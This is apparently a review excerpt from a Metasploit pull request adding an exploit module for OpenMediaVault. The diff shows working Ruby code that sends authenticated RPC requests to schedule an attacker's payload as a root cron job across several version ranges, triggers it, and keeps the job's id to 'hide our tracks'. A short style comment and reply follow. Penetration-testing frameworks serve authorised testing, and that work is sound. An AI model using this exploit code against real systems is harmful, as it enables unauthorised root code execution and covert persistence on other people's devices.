modules/exploits/multi/http/openmediavault_auth_cron_rce.rb

```diff
@@ -0,0 +1,323 @@
+          dayofweek: ['*'],
+          username: 'root',
+          command: cmd.to_s, # payload
+          sendemail: false,
+          comment: '',
+          type: 'userdefined'
+        },
+        options: nil
+      }.to_json
+    elsif Rex::Version.new(@version_number) <= Rex::Version.new('6.0.14-1') && Rex::Version.new(@version_number) >= Rex::Version.new('3.0.16')
+      # OpenMediaVault v3.0.16 - v6.0.14-1 uses a string definition '*'
+      post_data = {
+        service: 'Cron',
+        method: 'set',
+        params: {
+          uuid: 'fa4b1c66-ef79-11e5-87a0-0002b3a176b4',
+          enable: true,
+          execution: 'exactly',
+          minute: '*',
+          everynminute: false,
+          hour: '*',
+          everynhour: false,
+          dayofmonth: '*',
+          everyndayofmonth: false,
+          month: '*',
+          dayofweek: '*',
+          username: 'root',
+          command: cmd.to_s, # payload
+          sendemail: false,
+          comment: '',
+          type: 'userdefined'
+        },
+        options: nil
+      }.to_json
+    elsif Rex::Version.new(@version_number) <= Rex::Version.new('3.0.15') && Rex::Version.new(@version_number) >= Rex::Version.new('1.0.0')
+      # OpenMediaVault v1.0.0 - v3.0.15 uses a string definition '*' and uuid setting 'undefined'
+      post_data = {
+        service: 'Cron',
+        method: 'set',
+        params: {
+          uuid: 'undefined',
+          enable: true,
+          execution: 'exactly',
+          minute: '*',
+          everynminute: false,
+          hour: '*',
+          everynhour: false,
+          dayofmonth: '*',
+          everyndayofmonth: false,
+          month: '*',
+          dayofweek: '*',
+          username: 'root',
+          command: cmd.to_s, # payload
+          sendemail: false,
+          comment: '',
+          type: 'userdefined'
+        },
+        options: nil
+      }.to_json
+    end
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/rpc.php'),
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'keep_cookies' => true,
+      'data' => post_data
+    })
+    fail_with(Failure::Unknown, 'Cannot access cron services to schedule payload execution.') unless res && res.code == 200 && res.body.include?('"error":null')
+
+    # parse json response and get the uuid of the cron entry
+    # we need this later to clean up and hide our tracks
+    @cron_uuid = ''
+    res_json = res.get_json_document
+    @cron_uuid = res_json['response']['uuid'] unless res_json.blank?
+
+    # Apply and update cron configuration to trigger payload execution (1 minute)
+    res = apply_config_changes
+    fail_with(Failure::Unknown, 'Cannot apply cron changes to trigger payload execution.') unless res && res.code == 200 && res.body.include?('"error":null')
+    print_good('Cron payload execution triggered. Wait at least 1 minute for the session to be established.')
+  end
+
+  def on_new_session(session)
```

Comment:
By convention, non-used arguments should be prefixed with underscore.
```suggestion
  def on_new_session(_session)
```

Reply:
See https://github.com/rapid7/metasploit-framework/pull/19298/commits/594de4681fedbf42e5fc79b0f30e3b116655fafd.